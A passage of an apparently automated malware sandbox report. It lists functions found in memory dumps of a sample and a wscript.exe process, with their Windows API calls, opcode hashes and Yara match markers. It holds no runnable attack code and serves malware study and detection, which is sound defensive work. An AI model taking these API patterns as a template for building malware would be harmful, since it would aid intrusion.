Opcode Fuzzy Hash: a11c55db55b0562724ba075ab68179b2058fd3e956fd9a6888f125cc45b82d2a
Instruction Fuzzy Hash: 0D900261601010424240717D98449064005BBE1361761C131E4988550E85998865A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A19A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A19A0A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d9603a6cb29c1eecb3bc91a4e6c9efcebcc14c8e79d2278b4b002aa2a417185
Instruction ID: 24b6cb62f14a61a16b2f559375f3953bc999ff327a987523de8fe1893c0a765e
Opcode Fuzzy Hash: 9d9603a6cb29c1eecb3bc91a4e6c9efcebcc14c8e79d2278b4b002aa2a417185
Instruction Fuzzy Hash: 9790027120141402D200616D581470B000597D0352F61C031E5154555E86658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1971A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f29fcbfbae69effdbfa4e6824513d07f2c6639ccadec368d1d60d3be2da552f
Instruction ID: f5c46e032402593763c0e009cb1c4cdaa0e900f842e0d46bce5d98e76d778e13
Opcode Fuzzy Hash: 7f29fcbfbae69effdbfa4e6824513d07f2c6639ccadec368d1d60d3be2da552f
Instruction Fuzzy Hash: DF90027120101402D20065AD6408646000597E0351F61D031E9014555FC6A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00A19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1991A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0a44e484336edf8b160c6473afcff5912848f0e68d1e38d00522ccc504506a8
Instruction ID: 983a0f22cb5ea607c9e6e18367fc4c0ec7e44d90af9293294b4a1e3218b15597
Opcode Fuzzy Hash: b0a44e484336edf8b160c6473afcff5912848f0e68d1e38d00522ccc504506a8
Instruction Fuzzy Hash: 439002B120101402D240716D5404746000597D0351F61C031E9054554F86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1966A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d0757791d7bc39f9b852b72be5a0721690e7ba8ebf6b940fd01e46459c45061
Instruction ID: cd431dcfd52e6aa9f894b827b33137e13a6137a74f71ee7409eaa4f98b79e223
Opcode Fuzzy Hash: 4d0757791d7bc39f9b852b72be5a0721690e7ba8ebf6b940fd01e46459c45061
Instruction Fuzzy Hash: B190027120101802D280716D540464A000597D1351FA1C035E4015654ECA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1986A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15de31a939f4fc0052f740eb711f108c9e53354422efdfa5c4cae63d4c562408
Instruction ID: 5a328b43c4a2f31c8cc5ae56e65d39c11079c071943f5df38331f1fdb159f876
Opcode Fuzzy Hash: 15de31a939f4fc0052f740eb711f108c9e53354422efdfa5c4cae63d4c562408
Instruction Fuzzy Hash: AE90027120101413D211616D5504707000997D0391FA1C432E4414558E96968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00A19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1954A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fbf546b4bb3c42ecdabb8250a0de03ba0a36ff5f9e2eb85cfe90e2db257a2d8
Instruction ID: ac2e1d8a6c71141f269affc8560cf3a9b8e212b3264f742d4a0c0e532f7d237c
Opcode Fuzzy Hash: 1fbf546b4bb3c42ecdabb8250a0de03ba0a36ff5f9e2eb85cfe90e2db257a2d8
Instruction Fuzzy Hash: D9900265211010030205A56D1704507004697D53A1361C031F5005550DD6618861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00A19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A1984A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fdd68646c842707d4d01c36a7b58ee4f7b9908a0fe83064a1de8bcea76f64f8c
Instruction ID: 789dd4e83f24a23ef34c997753c559cfd7b9be26541772cd7ec02aa229d69c49
Opcode Fuzzy Hash: fdd68646c842707d4d01c36a7b58ee4f7b9908a0fe83064a1de8bcea76f64f8c
Instruction Fuzzy Hash: 56900261242051525645B16D54045074006A7E03917A1C032E5404950D85669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 00A19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A19A5A

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 571627f311731508edd7c491e6eff1eec101c5077cbd9aea42dd91de2c3f43c4
Instruction ID: 6c235da95b2aa13649ba012ad8512b494ea65b40347fe6be78c0923a7f75c1bb
Opcode Fuzzy Hash: 571627f311731508edd7c491e6eff1eec101c5077cbd9aea42dd91de2c3f43c4
Instruction Fuzzy Hash: 4A90026121181042D300657D5C14B07000597D0353F61C135E4144554DC9558861A561

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD

Strings

F5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 13119d7e7e02d7f816afb8232c10277a9abdf6e8b6f001c90d1aa8aad9b06221
Instruction ID: 6ee31f8ab96a980dcd69446e2aad247dbe559a5df63ab2b11106702328b4a2e9
Opcode Fuzzy Hash: 13119d7e7e02d7f816afb8232c10277a9abdf6e8b6f001c90d1aa8aad9b06221
Instruction Fuzzy Hash: 3801FDB52042446FCB14EBA49C89DE33BACEF41390F14498EFC8917202CA38AD54C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00407263, Relevance: 1.5, APIs: 1, Instructions: 40threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 749bc22121e77259128f93e52fe50e44993650164536a24b41617dfcecaecc98
Instruction ID: 1cb0bc9abefd718b16f78df7f90def9a8a0c47b573ba1ac9723929d264b51e13
Opcode Fuzzy Hash: 749bc22121e77259128f93e52fe50e44993650164536a24b41617dfcecaecc98
Instruction Fuzzy Hash: 38F0E931F8422436F62156915C03FBB77589B40F11F1500AFFF04FA1C1E6A86D1146EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a5714ebab8deb8b1c59236b194988a56b3aa61742115e08ad9416fee8f5f815a
Instruction ID: 816756130b1cdfcc81e611f44ea3a86a64dc87f36b26cacacb23cb38dbaa69ca
Opcode Fuzzy Hash: a5714ebab8deb8b1c59236b194988a56b3aa61742115e08ad9416fee8f5f815a
Instruction Fuzzy Hash: 95E06DB56002057FE719DF95CC49E977798EF88350F008999FD1C5B651D630E860CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418913, Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ba33f885d0767ed2361e370355fe500b5874024bd02dd801d8f9769f8848f774
Instruction ID: 8f18435794c1cf7a7ce09d533f79ea27bdc7dd8e2885380ac3afe72a2bc80574
Opcode Fuzzy Hash: ba33f885d0767ed2361e370355fe500b5874024bd02dd801d8f9769f8848f774
Instruction Fuzzy Hash: 8DE0C2741092022BD720CB248DC6F877BA4AF05300F28499EA8D85B143C278A64486A8

Uniqueness

Uniqueness Score: -1.00%

Function 00A1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A19694

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4aded6f9c402280d0ddc4bc4e0d01a7bd38b973ddfd07771982205000639c5c4
Instruction ID: 6a75e58aebd613f179cee16b623f8ee083db868935f688d0cbbe47fe64d4a065
Opcode Fuzzy Hash: 4aded6f9c402280d0ddc4bc4e0d01a7bd38b973ddfd07771982205000639c5c4
Instruction Fuzzy Hash: 87B092B29025E5CAEB11E7B45A08B2B7A00BBE0751F26C072E2120681B4778C4D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A198A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0baad9c01779469dda32cb45587887fe334021644379b519c7e2b94803e504
Instruction ID: ad17fe53c9a841a9697a71f05dcc5e4081d15f93713e7ee28c7e3fa1b74f161f
Opcode Fuzzy Hash: 5e0baad9c01779469dda32cb45587887fe334021644379b519c7e2b94803e504
Instruction Fuzzy Hash: A990026130101402D202616D54146060009D7D1395FA1C032E5414555E86658953F172

Uniqueness

Uniqueness Score: -1.00%

Function 00A199D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff41ef164e21829354d4047e5e8b3db51482775d0909f1f8ef6d70f57b117a80
Instruction ID: 73bccab904f79c1797fec9879b2798d6c5081669e8efca1c7eacb9148b98f953
Opcode Fuzzy Hash: ff41ef164e21829354d4047e5e8b3db51482775d0909f1f8ef6d70f57b117a80
Instruction Fuzzy Hash: C69002A121101042D204616D5404706004597E1351F61C032E6144554DC5698C61A165

Uniqueness

Uniqueness Score: -1.00%

Function 00A19820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6b719953acb7a7b60d5415f74093ae662470c4a7b6599e893da978e41f5b10f
Instruction ID: b461b69a1ff8463fa28210c4532b26aba13966d48db34b1cf07afb8c1e6fbaf0
Opcode Fuzzy Hash: a6b719953acb7a7b60d5415f74093ae662470c4a7b6599e893da978e41f5b10f
Instruction Fuzzy Hash: CA90027124101402D241716D54046060009A7D0391FA1C032E4414554F86958A56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815cfb29cdc0ff792f501b34615c8c9224987711b3e29df2cad8932be0c2648b
Instruction ID: 0d14ab051b1c382dc5e6de6f15059d6a61464bacdc43c130a29eedec6c41210e
Opcode Fuzzy Hash: 815cfb29cdc0ff792f501b34615c8c9224987711b3e29df2cad8932be0c2648b
Instruction Fuzzy Hash: 3B9002A1601150434640B16D58044065015A7E13513A1C131E4444560D86A88855E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A19950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdedca9452878780825c0efbfb70b9c5686780916e1a73cb15cc8e9b2f08e8b
Instruction ID: 92ae1ecde02384c61c67cbe7cbdf9e21e551efaed938f5c92292961c850eb8c6
Opcode Fuzzy Hash: 8bdedca9452878780825c0efbfb70b9c5686780916e1a73cb15cc8e9b2f08e8b
Instruction Fuzzy Hash: F39002A120141403D240656D5804607000597D0352F61C031E6054555F8A698C51B175

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wscript.exe PID: 4960 Parent PID: 3472 wscript.exeCOMMON

Executed Functions

Function 00B485CB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B43BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B43BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00B4861D

Strings

.z`, xrefs: 00B4860D, 00B48618

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 4b2e639e32f6fb0c345cf54f438962c7d2677e3d3393cecf9741b245bfa13b4d
Instruction ID: cbe4ed25b30a0524800c73ab64fe165f3354134348975079fce695f4aff032f5
Opcode Fuzzy Hash: 4b2e639e32f6fb0c345cf54f438962c7d2677e3d3393cecf9741b245bfa13b4d
Instruction Fuzzy Hash: 9601AFB2201108ABCB58CF98DC95EEB77A9AF8C754F158248FA0DE7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B485D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B43BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B43BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00B4861D

Strings

.z`, xrefs: 00B4860D, 00B48618

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: b924c81b7f213cbb8dcee118d4033bb707129df3fceb4c96be4efaf8c6b651e6
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 8BF0B2B2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B4867A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B43D82,5E972F65,FFFFFFFF,00B43A41,?,?,00B43D82,?,00B43A41,FFFFFFFF,5E972F65,00B43D82,?,00000000), ref: 00B486C5

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 12ec4e74f287611810e66c525f6784ef63c593f18b50d2e451f167c0d6d9aa59
Instruction ID: 77bf862caa1af38e1a100ca792d87905819297c29fbd5aaf49de08b5d4fd3b2b
Opcode Fuzzy Hash: 12ec4e74f287611810e66c525f6784ef63c593f18b50d2e451f167c0d6d9aa59
Instruction Fuzzy Hash: 7EF0EC71200209ABCB08DF89DC40DDB77ADAF8C714F158648FE0D97251DA30E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B48680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B43D82,5E972F65,FFFFFFFF,00B43A41,?,?,00B43D82,?,00B43A41,FFFFFFFF,5E972F65,00B43D82,?,00000000), ref: 00B486C5

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 95bfd3698ca9228f81b52ae2267706b0b450e17b2923918ec16063990e737528
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 61F0A9B2200108ABCB14DF89DC85DEB77ADAF8C754F158248BE1D97241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B487B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00B32D11,00002000,00003000,00000004), ref: 00B487E9

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: b4c3bdf8028c450881676f5130b1aad2d4d0c0fe3f4c060027fe6d605cb8dc8b
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 79F01CB1200208ABCB14DF89DC81EA777ADAF88750F118148BE0897241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B487AA, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00B32D11,00002000,00003000,00000004), ref: 00B487E9

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a31f70b4d0fdad7609985d488e4a87d37176d830bf904d857af841faada23ff3
Instruction ID: e6332fc2fbafa0a730efd012b149fe98bddaccf1b7791c35afc4b82e4b9a7f69
Opcode Fuzzy Hash: a31f70b4d0fdad7609985d488e4a87d37176d830bf904d857af841faada23ff3
Instruction Fuzzy Hash: 11F030B51101496BCB14DF98DC84CA777A9FF8C220B158A89FD4897202C234E855CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B486FB, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B43D60,?,?,00B43D60,00000000,FFFFFFFF), ref: 00B48725

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 579c785c6188b85c41ee949f7d5cab179328bcee0a99a7d720941540829a138c
Instruction ID: 28258d1daf072a12e5f0959eb8c61edbaacfabf8a038003c333b69c3536d516e
Opcode Fuzzy Hash: 579c785c6188b85c41ee949f7d5cab179328bcee0a99a7d720941540829a138c
Instruction Fuzzy Hash: 8DD02B9940D2C04FC711FB7468C50837F80DE525147145ACDD8E407503C564A215D391

Uniqueness

Uniqueness Score: -1.00%

Function 00B48700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B43D60,?,?,00B43D60,00000000,FFFFFFFF), ref: 00B48725

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 620471297088fe032f6999d5ebd28c81048a5acaa89967b11887fce1122ae8b2
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: D0D012752002147BD714EB98DC45E97779CEF44750F154595BA185B242C570F60086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B4872A, Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B43D60,?,?,00B43D60,00000000,FFFFFFFF), ref: 00B48725

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
Instruction ID: d6bd196748a3403eed4f189f8428ca3dc4d5e06cbe95ea90b7d7295b68cef25b
Opcode Fuzzy Hash: 3f38efd70032b30d505f00149dc41530f180062db7a116f8897dbaffbbde2f7a
Instruction Fuzzy Hash: 17A0023F24A429241A6162FC7C95CDD975CD4CABB632440AEF51CD48618C4B0B5126A3

Uniqueness

Uniqueness Score: -1.00%

Function 04C99840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9984A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cfad1a19b65804c06541443a8872ac0b98d0deed446a81db3ea0d7e95860fd00
Instruction ID: 4d3f7a4bbe6a5a95592986420d543e32e9ad85dde600a630dd0e6d00059ba8b2
Opcode Fuzzy Hash: cfad1a19b65804c06541443a8872ac0b98d0deed446a81db3ea0d7e95860fd00
Instruction Fuzzy Hash: 249002A1242043627545B15944045074117A7E028D7E1C012A1415990C8966E866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04C99860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

